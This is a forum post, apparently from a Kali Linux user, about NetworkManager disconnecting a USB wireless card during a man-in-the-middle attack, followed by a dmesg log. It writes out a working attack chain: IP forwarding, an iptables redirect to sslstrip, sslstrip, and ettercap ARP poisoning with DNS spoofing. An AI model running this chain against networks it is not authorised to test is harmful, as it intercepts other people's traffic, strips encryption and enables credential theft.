hi every one,
i've been working on my MITM skillz and then i noticed something not really pleasent thing: network manger disconnects me everytime i am doing MITM
here are the details:

Code:
uname -a : Linux whiteshadow 3.7-trunk-amd64 #1 SMP Debian 3.7.2-0+kali8 x86_64 GNU/Linux
Code:
lsb_release -d : Description:	Debian GNU/Linux Kali Linux 1.0
here is the mitm attack that i am implementing :

Code:
echo 1 > /proc/sys/net/ipv4/ip_forwar
Code:
 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Code:
 sslstrip -a -f -l 1000
Code:
 ettercap -T -Q -M arp:remote -i wlan0 // // -P dns_spoof
so after all that, what i am getting is that it seems to run fine for a minute or so and then network-manager starts to disconnected and unless i restart network manager by this:
Code:
 /etc/init.d/network-manager restart
i won't connect me back to network.
another thing that i shoud mentions is that i am using alfa usb wireless card mode :
AWUS036H
here is the dmeg output :
[ 877.618313] wlan3: authenticate with 14:d6:4d:f3:5a:98
[ 877.735812] wlan3: send auth to 14:d6:4d:f3:5a:98 (try 1/3)
[ 877.739894] wlan3: authenticated
[ 877.740950] wlan3: associate with 14:d6:4d:f3:5a:98 (try 1/3)
[ 877.744580] wlan3: RX AssocResp from 14:d6:4d:f3:5a:98 (capab=0x411 status=0 aid=2)
[ 877.745782] wlan3: associated
[ 877.745801] IPv6: ADDRCONF(NETDEV_CHANGE): wlan3: link becomes ready
[ 938.371601] wlan3: deauthenticating from 14:d6:4d:f3:5a:98 by local choice (reason=3)
[ 938.436847] cfg80211: Calling CRDA to update world regulatory domain
[ 938.445501] cfg80211: World regulatory domain updated:
[ 938.445508] cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
[ 938.445514] cfg80211: (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
[ 938.445519] cfg80211: (2457000 KHz - 2482000 KHz @ 20000 KHz), (300 mBi, 2000 mBm)
[ 938.445524] cfg80211: (2474000 KHz - 2494000 KHz @ 20000 KHz), (300 mBi, 2000 mBm)
[ 938.445529] cfg80211: (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
[ 938.445533] cfg80211: (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
[ 940.427266] wlan3: authenticate with 00:c0:ca:74:a3:26
[ 940.549255] wlan3: send auth to 00:c0:ca:74:a3:26 (try 1/3)
[ 940.555517] wlan3: authenticated
[ 940.558081] wlan3: associate with 00:c0:ca:74:a3:26 (try 1/3)
[ 940.561124] wlan3: RX AssocResp from 00:c0:ca:74:a3:26 (capab=0x411 status=0 aid=3)
[ 940.562380] wlan3: associated
[ 940.562462] cfg80211: Calling CRDA for country: EU
[ 940.570348] cfg80211: Regulatory domain changed to country: EU
[ 940.570355] cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
[ 940.570360] cfg80211: (2402000 KHz - 2482000 KHz @ 40000 KHz), (N/A, 2000 mBm)
[ 940.570365] cfg80211: (5170000 KHz - 5250000 KHz @ 40000 KHz), (N/A, 2000 mBm)
[ 940.570369] cfg80211: (5250000 KHz - 5330000 KHz @ 40000 KHz), (N/A, 2000 mBm)
[ 940.570373] cfg80211: (5490000 KHz - 5710000 KHz @ 40000 KHz), (N/A, 2700 mBm)
[ 951.161587] device wlan3 entered promiscuous mode
[ 1087.240009] device wlan3 left promiscuous mode
[ 1147.872443] device wlan3 entered promiscuous mode
[ 1291.939287] usb 2-1.2: USB disconnect, device number 10
[ 1291.939513] wlan3: deauthenticating from 00:c0:ca:74:a3:26 by local choice (reason=3)
[ 1291.987436] cfg80211: Calling CRDA to update world regulatory domain
[ 1292.043625] device wlan3 left promiscuous mode
i really hope you could try to help to solve this out.
thanks in advance.